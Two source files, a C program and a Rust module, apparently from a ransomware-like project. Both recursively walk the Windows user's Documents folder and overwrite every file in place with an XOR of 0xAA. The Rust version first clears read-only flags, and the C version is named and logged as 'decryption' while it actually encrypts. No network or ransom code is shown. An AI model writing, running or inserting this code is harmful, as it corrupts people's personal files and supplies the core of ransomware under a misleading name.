File: CLI/decrypt.c
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <shlobj.h>

FILE *logFile = NULL;  // File pointer for logging errors

// Function prototypes
void encryptDocuments(void);
void encryptFolder(const TCHAR* folderPath);
void encryptFile(const TCHAR* filePath);

// Function to log error messages to the report file
void logError(const TCHAR *errorMsg) {
    if (logFile) {
        _ftprintf(logFile, TEXT("%s\n"), errorMsg);
        fflush(logFile);  // Ensure the message is written immediately
    }
}

// Main function - Entry point for the executable
int main() {
    // Open the report file for appending error messages
    logFile = _tfopen(TEXT("report.txt"), TEXT("a"));
    if (logFile) {
        logError(TEXT("Executable Loaded - Starting process...\n"));
        encryptDocuments();  // Calls the function to decrypt the Documents folder
        logError(TEXT("Decryption completed.\n"));
        fclose(logFile); // Close the log file
    } else {
        // If the file can't be opened, print a generic error to the console
        MessageBox(NULL, TEXT("Failed to open the report file."), TEXT("Error"), MB_OK);
        return 1;  // Return error code
    }

    return 0;  // Successfully executed
}

// Function to decrypt the Documents folder
void encryptDocuments() {
    TCHAR szPath[MAX_PATH];
    
    // Get the path to the user's Documents folder
    if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_MYDOCUMENTS, NULL, 0, szPath))) {
        _tprintf(TEXT("Documents folder found at: %s\n"), szPath);  // Display the found path
        logError(TEXT("Found Documents folder: "));
        logError(szPath); // Log the folder path

        // Begin recursive decryption of the files and folders inside Documents
        encryptFolder(szPath);
    } else {
        logError(TEXT("Error retrieving Documents folder path.\n"));
    }
}

// Recursive function to encrypt the folder and its subdirectories
void encryptFolder(const TCHAR* folderPath) {
    TCHAR searchPath[MAX_PATH];
    
    // Add * to search for all files and folders inside the folder
    _tcscpy_s(searchPath, MAX_PATH, folderPath);
    _tcscat_s(searchPath, MAX_PATH, _T("\\*")); // Add wildcard for file and folder search

    WIN32_FIND_DATA findFileData;
    HANDLE hFind = FindFirstFile(searchPath, &findFileData);

    if (hFind == INVALID_HANDLE_VALUE) {
        logError(TEXT("Error accessing folder.\n"));
        return;
    }

    do {
        // Skip "." and ".."
        if (_tcscmp(findFileData.cFileName, _T(".")) != 0 && _tcscmp(findFileData.cFileName, _T("..")) != 0) {
            TCHAR fullFilePath[MAX_PATH];
            _tcscpy_s(fullFilePath, MAX_PATH, folderPath);
            _tcscat_s(fullFilePath, MAX_PATH, _T("\\")); 
            _tcscat_s(fullFilePath, MAX_PATH, findFileData.cFileName);

            // Check if it's a file or a folder
            if (findFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
                // If it's a folder, recursively call the encryption function
                _tprintf(TEXT("Found folder: %s\n"), fullFilePath);
                logError(TEXT("Found folder: "));
                logError(fullFilePath); // Log folder path

                // Recursively encrypt files in the subfolder
                encryptFolder(fullFilePath);
            } else {
                // If it's a file, encrypt it
                _tprintf(TEXT("Encrypting file: %s\n"), fullFilePath);
                logError(TEXT("Encrypting file: "));
                logError(fullFilePath); // Log file path

                // Encrypt the file
                encryptFile(fullFilePath);
            }
        }
    } while (FindNextFile(hFind, &findFileData));

    FindClose(hFind);
}

// Function to encrypt a file (simple encryption with XOR for testing)
void encryptFile(const TCHAR* filePath) {
    // Open the file for reading and writing
    HANDLE hFile = CreateFile(filePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        TCHAR errorMsg[MAX_PATH];
        _stprintf_s(errorMsg, MAX_PATH, TEXT("Error opening file %s\n"), filePath);
        logError(errorMsg);
        return;
    }

    DWORD dwFileSize = GetFileSize(hFile, NULL);
    if (dwFileSize == INVALID_FILE_SIZE) {
        TCHAR errorMsg[MAX_PATH];
        _stprintf_s(errorMsg, MAX_PATH, TEXT("Error retrieving file size for %s\n"), filePath);
        logError(errorMsg);
        CloseHandle(hFile);
        return;
    }

    // Allocate a buffer for the file content
    BYTE* buffer = (BYTE*)malloc(dwFileSize);
    DWORD dwBytesRead;
    if (!ReadFile(hFile, buffer, dwFileSize, &dwBytesRead, NULL) || dwBytesRead != dwFileSize) {
        TCHAR errorMsg[MAX_PATH];
        _stprintf_s(errorMsg, MAX_PATH, TEXT("Error reading file content %s\n"), filePath);
        logError(errorMsg);
        free(buffer);
        CloseHandle(hFile);
        return;
    }

    // Encrypt the content (using XOR as an example)
    for (DWORD i = 0; i < dwFileSize; i++) {
        buffer[i] ^= 0xAA; // XOR with 0xAA
    }

    // Write the encrypted content back to the file
    SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
    DWORD dwBytesWritten;
    if (!WriteFile(hFile, buffer, dwFileSize, &dwBytesWritten, NULL) || dwBytesWritten != dwFileSize) {
        TCHAR errorMsg[MAX_PATH];
        _stprintf_s(errorMsg, MAX_PATH, TEXT("Error writing to file %s\n"), filePath);
        logError(errorMsg);
        free(buffer);
        CloseHandle(hFile);
        return;
    }

    // Free resources
    free(buffer);
    CloseHandle(hFile);
}

File: CLI/src/decrypt.rs
use std::io;

#[cfg(target_os = "windows")]
use std::fs::{self, File};
#[cfg(target_os = "windows")]
use std::io::{Read, Write};
#[cfg(target_os = "windows")]
use std::path::{Path, PathBuf};
#[cfg(target_os = "windows")]
use winapi::um::shlobj::{SHGetFolderPathW, CSIDL_PERSONAL};

#[cfg(target_os = "windows")]
pub fn decrypt_documents_cli() {
    let mut log_file = match open_log_file() {
        Ok(file) => file,
        Err(e) => {
            eprintln!("Failed to open the log file: {}", e);
            return;
        }
    };

    if let Err(e) = decrypt_documents(&mut log_file) {
        log_error(&mut log_file, &format!("Error: {}", e));
        eprintln!("Error: {}", e);
    } else {
        log_error(&mut log_file, "Decryption completed.");
        println!("[+] Decryption completed. Check 'report.txt' for details.");
    }
}

#[cfg(not(target_os = "windows"))]
pub fn decrypt_documents_cli() {
    println!("Decryption is only supported on Windows.");
}

#[cfg(target_os = "windows")]
fn open_log_file() -> io::Result<File> {
    File::create("report.txt")
}

#[cfg(target_os = "windows")]
fn log_error(file: &mut File, message: &str) {
    writeln!(file, "{}", message).unwrap();
}

#[cfg(target_os = "windows")]
fn decrypt_documents(log_file: &mut File) -> io::Result<()> {
    let documents_path = get_documents_folder()?;
    log_error(
        log_file,
        &format!("Found Documents folder: {}", documents_path.display()),
    );

    decrypt_folder(&documents_path, log_file)
}

#[cfg(target_os = "windows")]
fn get_documents_folder() -> io::Result<PathBuf> {
    let mut path = [0u16; 260]; // MAX_PATH
    unsafe {
        let result = SHGetFolderPathW(
            std::ptr::null_mut(),
            CSIDL_PERSONAL,
            std::ptr::null_mut(),
            0,
            path.as_mut_ptr(),
        );
        if result == 0 {
            let path_string = String::from_utf16_lossy(&path);
            Ok(PathBuf::from(path_string.trim_matches(char::from(0))))
        } else {
            Err(io::Error::new(
                io::ErrorKind::NotFound,
                "Failed to retrieve Documents folder path",
            ))
        }
    }
}

#[cfg(target_os = "windows")]
fn decrypt_folder(path: &Path, log_file: &mut File) -> io::Result<()> {
    for entry in fs::read_dir(path)? {
        let entry = entry?;
        let entry_path = entry.path();

        // Skip known system folders
        if entry_path.file_name().map_or(false, |name| {
            name == "My Music" || name == "My Pictures" || name == "My Videos"
        }) {
            log_error(log_file, &format!(
                "Skipping system folder: {}",
                entry_path.display()
            ));
            continue;
        }

        if entry_path.is_dir() {
            log_error(log_file, &format!("Found folder: {}", entry_path.display()));
            if let Err(e) = decrypt_folder(&entry_path, log_file) {
                log_error(
                    log_file,
                    &format!(
                        "Skipping folder {}: {}",
                        entry_path.display(),
                        e
                    ),
                );
                continue;
            }
        } else {
            log_error(log_file, &format!("Decrypting file: {}", entry_path.display()));
            if let Err(e) = decrypt_file(&entry_path) {
                log_error(
                    log_file,
                    &format!(
                        "Failed to decrypt file {}: {}",
                        entry_path.display(),
                        e
                    ),
                );
                continue;
            }
        }
    }
    Ok(())
}



#[cfg(target_os = "windows")]
fn decrypt_file(file_path: &Path) -> io::Result<()> {
    if !file_path.exists() {
        return Err(io::Error::new(
            io::ErrorKind::NotFound,
            "File does not exist",
        ));
    }

    ensure_writable(file_path)?;

    let mut file = File::open(file_path)?;
    let mut contents = Vec::new();
    file.read_to_end(&mut contents)?;

    // Decrypt the contents using XOR (0xAA)
    for byte in &mut contents {
        *byte ^= 0xAA;
    }

    let mut file = File::create(file_path)?;
    file.write_all(&contents)?;

    Ok(())
}

#[cfg(target_os = "windows")]
fn ensure_writable(file_path: &Path) -> io::Result<()> {
    let metadata = file_path.metadata()?;
    let mut permissions = metadata.permissions();
    permissions.set_readonly(false); // Disable read-only to allow writing
    fs::set_permissions(file_path, permissions)
}



